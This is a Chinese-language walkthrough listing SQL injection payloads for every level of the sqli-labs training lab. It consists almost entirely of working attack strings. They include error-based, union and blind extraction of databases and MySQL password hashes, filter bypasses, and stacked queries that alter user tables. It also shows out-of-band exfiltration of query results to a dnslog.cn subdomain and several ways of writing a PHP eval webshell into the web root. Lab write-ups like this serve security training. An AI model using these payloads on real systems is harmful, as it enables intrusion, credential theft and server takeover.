sqli-labs全通关payload

---

运行环境

*****************
*mysql  5.7.26  *
*php    5.5.9nts*
*apache 2.4.39  *
*****************

Less-1(漏洞利用)

基于报错注入查询数据库数据
gtid_subset报错
1' and gtid_subset(user(),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)%23
1' and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(concat(username,':',password)) from security.users)),1) %23
floor报错
-1'  union select 1,2,count(*) from information_schema.tables group by concat(floor(rand(0)*2) ,0x7e,user())%23
updatexml报错
' or updatexml(1,concat(0x7e,database()),1)%23
extractvalue报错
' or extractvalue(1,concat(0x7e,database()))%23

联合查询注入查询数据库数据
-1' union select 1,2,3 %23
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' %23
-1' union select 1,2,group_concat(concat(username,':',password)) from security.users %23

带外查询注入查询数据库数据
注：yourid需要上dnslog.cn获取，查询结果也需要在那上面查看，不行就重新获取id或重试几次
-1' union select 1,2,load_file(concat('////',(select schema_name from information_schema.schemata limit 0,1),'.yourid.dnslog.cn/abc')) %23
-1' or if((select load_file(concat('////',(select schema_name from information_schema.schemata limit 4,1),'.yourid.dnslog.cn/abc'))),1,0) %23

查看数据库路径，如果是用phpstudy就可以知道www根目录
' union select 1,2,@@datadir %23
查看数据库版本
-1' union select 1,2,version() %23
查看数据库所在的主机主机名
-1' union select 1,2,@@hostname %23
查看当前数据库用户
-1' union select 1,2,user() %23
查看数据库所有用户
-1' union select 1,2,group_concat(concat(user,'@',host)) from mysql.user %23
查看数据库用户的密码(拿去cmd5解密)
-1' union SELECT 1,2,group_concat(concat(user,'-',authentication_string)) FROM mysql.user %23
查看用户所有权限
-1' union SELECT 1,2,group_concat(concat(grantee,'-',privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES %23
查看当前用户是否有文件读取写入权限（有为Y，无为N,把users的值改为当前用户）
' or updatexml(1,concat('~file_priv:',(SELECT file_priv FROM mysql.user WHERE user='root' )),1)%23
查看Mysql是否允许文件读取写入（为空代表有）
-1' union select 1,2,@@secure_file_priv %23

读取文件内容（路径有文件读取才行）
-1' union select 1,2,load_file('e:/url.txt') %23

导出数据(写入文件)
-1' union select 1,2,user() into outfile 'e:/demo.txt' %23
-1' union select 1,2,user() into dumpfile 'e:/demo1.txt' %23

导出一句话木马到目标服务器
-1' union select 1,2,"<?php eval($_REQUEST['pass'])?>" into outfile 'F:/phpstudy_pro/WWW/muma.php' %23
1' into outfile 'F:/phpstudy_pro/WWW/muma1.php' lines terminated by '<?php eval($_REQUEST['pass'])?>' %23
1' into outfile 'F:/phpstudy_pro/WWW/muma2.php' lines starting by "<?php eval($_REQUEST['pass'])?>"%23
1' into outfile 'F:/phpstudy_pro/WWW/muma3.php' fields terminated by "<?php eval($_REQUEST['pass'])?>"%23
1' into outfile 'F:/phpstudy_pro/WWW/muma4.php' COLUMNS terminated by "<?php eval($_REQUEST['pass'])?>"%23
将一句话木马转换成十六进制，Mysql能够识别，并将十六进制转换为字符串
1' into outfile 'F:/phpstudy_pro/WWW/muma5.php' lines terminated by 0x3c3f706870206576616c28245f524551554553545b2770617373275d293f3e %23

查看慢日志查询是否开启（开启为1，关闭为0）
-1' union select 1,2,@@slow_query_log %23
慢日志查询在my.ini配置文件中[mysqld]下添加slow_query_log = ON即可开启
如果开启了，查看日志存放路径（如F:\phpstudy_pro\Extensions\MySQL5.7.26\data\DESKTOP-SRG99HI-slow.log）
-1' union select 1,2,@@slow_query_log_file %23
慢查询默认将执行了10秒的sql语句存放在日志中,我们构造一个睡10秒的sql语句
-1' union select 1,sleep(10),"<?php eval($_REQUEST['pass'])?>" %23
然后将日志复制到www根目录下，方便我们使用工具getshell
-1' union select 1,2,load_file('F:/phpstudy_pro/Extensions/MySQL5.7.26/data/DESKTOP-SRG99HI-slow.log') into outfile "F:/phpstudy_pro/WWW/muma6.php" %23

Less-2

1 or gtid_subset(user(),1)
1 and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)

Less-3

1') or gtid_subset(user(),1)%23
1') and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)%23

Less-4

1") or gtid_subset(user(),1)%23

Less-5

1' or gtid_subset(user(),1)%23

Less-6

1" or gtid_subset(user(),1)%23

Less-7

-1')) union select 1,2,user() into outfile 'e:/demo.txt' %23

Less-8

' or ascii(substr(database(),1,1))>97 %23
' or ascii(substr(database(),1,1))=115 %23

Less-9

' or if(ascii(substr(database(),1,1))=114,sleep(2),1) %23
' or if(ascii(substr(database(),1,1))=115,sleep(2),1) %23

Less-10

" or if(ascii(substr(database(),1,1))=114,sleep(2),1) %23
" or if(ascii(substr(database(),1,1))=115,sleep(2),1) %23

Less-11

Less11-17开burpsuite改请求体

uname=1' or gtid_subset(user(),1)%23&passwd=12&submit=Submit

Less-12

uname=1") or gtid_subset(user(),1)%23&passwd=12&submit=Submit

Less-13

uname=1') or gtid_subset(user(),1)%23&passwd=12&submit=Submit

Less-14

uname=1" or gtid_subset(user(),1)%23&passwd=12&submit=Submit

Less-15

uname=' or ascii(substr(database(),1,1))=114 %23&passwd=12&submit=Submit
uname=' or ascii(substr(database(),1,1))=115 %23&passwd=12&submit=Submit

Less-16

uname=") or if(ascii(substr(database(),1,1))=114,sleep(2),1)%23&passwd=12&submit=Submit
uname=") or if(ascii(substr(database(),1,1))=115,sleep(2),1)%23&passwd=12&submit=Submit

Less-17

uname=admin&passwd=1' and gtid_subset(user(),1)%23&submit=Submit

Less-18

UA注入
登录时的账号密码一定要正确，然后抓包修改UA

User-Agent: ' or gtid_subset(user(),1) or '

Less-19

Referer注入
登录时的账号密码一定要正确，然后抓包修改Referer

Referer: ' or gtid_subset(user(),1) or '

Less-20

cookie注入
登录时的账号密码一定要正确，然后抓包第二个包修改cookie

Cookie: uname=' or gtid_subset(user(),1)%23

Less-21

cookie注入
登录时的账号密码一定要正确，然后抓包第二个包修改cookie,cookie要进行base64加密

加密前：') or gtid_subset(user(),1)#  加密后：Jykgb3IgZ3RpZF9zdWJzZXQodXNlcigpLDEpIw==
Cookie: uname=Jykgb3IgZ3RpZF9zdWJzZXQodXNlcigpLDEpIw==

Less-22

cookie注入
登录时的账号密码一定要正确，然后抓包第二个包修改cookie,cookie要进行base64加密

加密前：" or gtid_subset(user(),1)#  加密后：IiBvciBndGlkX3N1YnNldCh1c2VyKCksMSkj
Cookie: uname=IiBvciBndGlkX3N1YnNldCh1c2VyKCksMSkj

Less-23

过滤#,--绕过

' or gtid_subset(user(),1) or '
' union select 1,user(),3 or '
' union select 1,user(),3 '

Less-24

二次注入

1.创建一个用户test 密码asd
2.假装用户test忘记密码
3.创建一个用户test'# 密码123
4.登录test'#用户 ，修改密码为admin
5.（数据库执行了UPDATE users SET PASSWORD='admin' where username='test'#' and password='123'这个sql语句）
6.所以本来是修改test'#用户的密码，变成了修改test的密码

Less-25

过滤and,or绕过

' oorr gtid_subset(user(),1)%23
' aandnd gtid_subset(user(),1)%23
' %26%26 gtid_subset(user(),1)%23
' %7c%7c gtid_subset(user(),1)%23

Less-25a

过滤and,or绕过

-1 oorr ascii(substr(database(),1,1))=114
-1 oorr ascii(substr(database(),1,1))=115

Less-26

过滤and,or,#,--,/*,\s,\绕过

'||gtid_subset(user(),1)||'
'%26%26gtid_subset(database(),1)%26%26'

Less-26a

过滤and,or,#,--,/*,\s,\绕过

'||ascii(substr(database(),1,1))=114||'
'||ascii(substr(database(),1,1))=115||'

Less-27

过滤union,select,and,or,#,--,/*,空格绕过

'%0aUnIoN%0aSeLeCT%0a1,user(),3||'
'||gtid_subset(concat(0x7e,(SeLeCT%0agroup_concat(schema_name)%0afrom%0ainformation_schema.schemata)),1)||'

Less-27a

过滤union,select,and,or,#,--,/*,空格绕过

"%0aUnIoN%0aSeLeCT%0a1,user(),3||"

Less-28

过滤union select,#,--,/*,空格绕过

')%0auunion%0aselectnion%0aselect%0a1,user(),3||('

Less-28a

过滤union select绕过

')%0auunion%0aselectnion%0aselect%0a1,user(),3||('

Less-29

白名单绕过
关卡在login.php,不在index.php
使用HTTP参数污染，源码只验证了第一个id值，没进行验证第二个id值

http://192.168.31.242/sqli-labs/Less-29/login.php?id=1&id=-1' union select 1,2,database() --+

Less-30

白名单绕过
关卡在login.php,不在index.php
HTTP参数污染
源码只验证了第一个id值，没进行验证第二个id值

http://192.168.31.242/sqli-labs/Less-30/login.php?id=1&id=-1" union select 1,2,database() --+

Less-31

白名单绕过
关卡在login.php,不在index.php
HTTP参数污染
源码只验证了第一个id值，没进行验证第二个id值

http://192.168.31.242/sqli-labs/Less-31/login.php?id=1&id=-1") union select 1,2,database() --+

Less-32

宽字节绕过转义

-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875 %23

0x70696b61636875是pikachu转十六进制的值

Less-33

宽字节绕过转义

-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875 %23

Less-34

宽字节绕过转义
开burpsuite改请求体

uname=12&passwd=12%df' or gtid_subset(user(),1) %23&submit=Submit

Less-35

宽字节绕过转义

1 and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)
查看pikachu的表
1 and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875)),1)

Less-36

宽字节绕过转义

-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23

Less-37

宽字节绕过转义
开burpsuite改请求体

uname=-1%df' union select 2,group_concat(schema_name) from information_schema.schemata%23&passwd=12&submit=Submit

Less-38

堆叠查询，先用联合查询注入知道数据库、表、列的值

1';create database abc;
-1';insert into users values(17,'test2','0');
-1';delete from users where username='test2';
-1';update users set password='123' where username='Dumb';

Less-39

堆叠查询

-1;insert into users values(18,'test3','0');

Less-40

堆叠查询

-1');insert into users values(19,'test4','0');

Less-41

堆叠查询

1;insert into users values(20,'test5','0');

Less-42

堆叠查询
开burpsuite改请求体

login_user=11&login_password=-1';insert into users values(21,'test5','0');&mysubmit=Login

（这里相当于新建一个test5用户，密码为0）

Less-43

可以不用堆叠查询
开burpsuite改请求体

login_user=11&login_password=1') or gtid_subset(user(),1) %23&mysubmit=Login

Less-44

堆叠查询
开burpsuite改请求体

login_user=11&login_password=1';insert into users values(22,'test6','0');&mysubmit=Login

Less-45

堆叠查询
开burpsuite改请求体

login_user=11&login_password=1');insert into users values(23,'test6','0');&mysubmit=Login

Less-46

order by注入
报错注入

updatexml(1,concat(0x7e,user()),1)
extractvalue(1,concat(0x7e,database()))

时间盲注

1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))

写入一句话木马

1 INTO OUTFILE 'e:/m.php' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b2770617373275d293f3e

Less-47

order by注入

1' and updatexml(1,concat(0x7e,user()),1)%23
1' and extractvalue(1,concat(0x7e,database()))%23

写入木马

1' INTO OUTFILE 'e:/m.php' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b2770617373275d293f3e %23

Less-48

order by注入
时间盲注

1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))

Less-49

order by注入
时间盲注

1' and if(ascii(substr(database(),1,1))=115,0,sleep(2))%23
1' and if(ascii(substr(database(),1,1))=116,0,sleep(2))%23

Less-50

order by注入
报错注入

updatexml(1,concat(0x7e,user()),1)
extractvalue(1,concat(0x7e,database()))

还可以堆叠查询注入，参考Less-38

Less-51

order by注入

1' and updatexml(1,concat(0x7e,user()),1)%23
1' and extractvalue(1,concat(0x7e,database()))%23

还可以堆叠查询注入，参考Less-38

Less-52

order by注入
时间盲注

1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))

还可以堆叠查询注入，参考Less-38

Less-53

order by注入
时间盲注

1' and if(ascii(substr(database(),1,1))=115,0,sleep(2))%23
1' and if(ascii(substr(database(),1,1))=116,0,sleep(2))%23

还可以堆叠查询注入，参考Less-38

Less-54

此挑战的目标是在不到10次的尝试中，仅从数据库的随机表（“挑战”）中转储（密钥）为了好玩，每次重置，挑战都会产生随机的表名、列名和表数据。随时保持新鲜([]中的参数需要更改)

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
查到表名是nvw9mo2tqp
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='[nvw9mo2tqp]' %23
查到字段名是id,sessid,secret_CJZ0,tryy
-1' union select 1,2,group_concat(concat(sessid,':',[secret_CJZ0])) from challenges.[nvw9mo2tqp] %23
然后将：后面的值提交即可过关

Less-55

首先点击Reset the Challenge!，重置数据库，方法跟Less-54一样

-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
查到表名是wchcrmmhzw
-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='wchcrmmhzw' %23
查到字段名是id,sessid,secret_CDNC,tryy
-1) union select 1,2,group_concat(concat(sessid,':',secret_CDNC)) from challenges.wchcrmmhzw %23
然后将：后面的值提交即可过关

Less-56

首先点击Reset the Challenge!，重置数据库，方法跟Less-54一样

-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
查到表名是u4w32ptczx
-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='u4w32ptczx' %23
查到字段名是id,sessid,secret_SADN,tryy
-1') union select 1,2,group_concat(concat(sessid,':',secret_SADN)) from challenges.u4w32ptczx %23
然后将：后面的值提交即可过关

Less-57

首先点击Reset the Challenge!，重置数据库，方法跟Less-54一样

-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
查到表名是kktpgr0pk2
-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='kktpgr0pk2' %23
查到字段名是id,sessid,secret_533C,tryy
-1" union select 1,2,group_concat(concat(sessid,':',secret_533C)) from challenges.kktpgr0pk2 %23
然后将：后面的值提交即可过关

Less-58

首先点击Reset the Challenge!，重置数据库,这关需要使用报错注入查询

1' and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
查到表名是ub4yi19a96
1' and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='ub4yi19a96')),1) %23
查到字段名是id,sessid,secret_I3Z9,tryy
1' and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_I3Z9)) from challenges.ub4yi19a96)),1) %23
然后将：后面的值提交即可过关

Less-59

首先点击Reset the Challenge!，重置数据库,这关需要使用报错注入查询

1 and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) 
查到表名是6dwnu523h0
1 and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='6dwnu523h0')),1) 
查到字段名是id,sessid,secret_R6HL,tryy
1 and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_R6HL)) from challenges.6dwnu523h0)),1)
然后将：后面的值提交即可过关

Less-60

首先点击Reset the Challenge!，重置数据库,这关需要使用报错注入查询
1") and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
查到表名是8zl4ya4h4y
1") and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='8zl4ya4h4y')),1) %23
查到字段名是id,sessid,secret_XWZV,tryy
1") and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_XWZV)) from challenges.8zl4ya4h4y)),1)%23
然后将：后面的值提交即可过关

Less-61

首先点击Reset the Challenge!，重置数据库,这关需要使用报错注入查询
1')) and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
查到表名是vt3n10iqbm
1')) and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='vt3n10iqbm')),1) %23
查到字段名是id,sessid,secret_JX4B,tryy
1')) and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_JX4B)) from challenges.vt3n10iqbm)),1)%23
然后将：后面的值提交即可过关

Less-62

首先点击Reset the Challenge!，重置数据库,这关需要使用布尔类型盲注

') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>110 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>103 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>100 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=102 %23
查到表名是第一个字母是f
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>97 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>110 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>103 %23
查看表名第二个字母以从类推
查出表名之后再猜字段
') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="challenges" and table_name="{}" ),1,1))>97%23
') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="challenges" and table_name="{}" ),1,1))>110%23
查完字段之后猜记录
') or ascii(substr((select group_concat(col)from challenges.tb_name),1,1))>97%23

…
由于太过繁杂，所以我这里写了一个脚本
https://blog.csdn.net/weixin_43623271/article/details/122801470

Less-63

首先点击Reset the Challenge!，重置数据库,这关需要使用布尔类型盲注
跟Less-62一样，只是payload闭合方式不一样

' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>110 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>103 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=103 %23

跑脚本
https://blog.csdn.net/weixin_43623271/article/details/122801470

Less-64

首先点击Reset the Challenge!，重置数据库,这关需要使用布尔类型盲注
跟Less-62一样，只是payload闭合方式不一样

1)) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
1)) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23

跑脚本
https://blog.csdn.net/weixin_43623271/article/details/122801470

Less-65

首先点击Reset the Challenge!，重置数据库,这关需要使用布尔类型盲注
跟Less-62一样，只是payload闭合方式不一样

1") and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
1") and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23

跑脚本
https://blog.csdn.net/weixin_43623271/article/details/122801470